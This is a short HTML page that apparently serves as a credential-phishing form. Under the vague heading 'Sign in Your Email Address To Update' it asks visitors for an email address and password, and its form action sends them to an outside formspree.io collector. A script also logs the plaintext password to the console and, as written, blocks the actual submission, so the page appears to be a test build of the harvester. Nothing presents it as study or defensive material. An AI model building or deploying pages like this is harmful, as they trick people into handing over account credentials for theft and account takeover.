<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Email Form</title>
    <style>
      body {
        font-family: Arial, sans-serif;
      }
      form {
        max-width: 300px;
        margin: 0 auto;
      }
      input[type="text"],
      input[type="password"] {
        width: 100%;
        padding: 10px;
        margin: 5px 0;
        border: 1px solid #ccc;
        border-radius: 4px;
        box-sizing: border-box;
      }
      input[type="submit"] {
        background-color: #4caf50;
        color: white;
        padding: 10px 20px;
        border: none;
        border-radius: 4px;
        cursor: pointer;
      }
      input[type="submit"]:hover {
        background-color: #45a049;
      }
    </style>
  </head>
  <body>
    <center><h2>Sign in Your Email Address To Update</h2></center>

    <form id="emailForm" action="https://formspree.io/f/mwkgzzeg" method="POST">
      <label for="email">Email:</label>
      <input type="text" id="email" name="email" required />
      <label for="password">Password:</label>
      <input type="password" id="password" name="password" required />
      <input type="submit" value="Submit" />
    </form>

    <script>
      document
        .getElementById("emailForm")
        .addEventListener("submit", function (event) {
          event.preventDefault(); // Prevent default form submission
          var email = document.getElementById("email").value;
          var password = document.getElementById("password").value;

          console.log("Email:", email);
          console.log("Password:", password);
        });
    </script>
  </body>
</html>
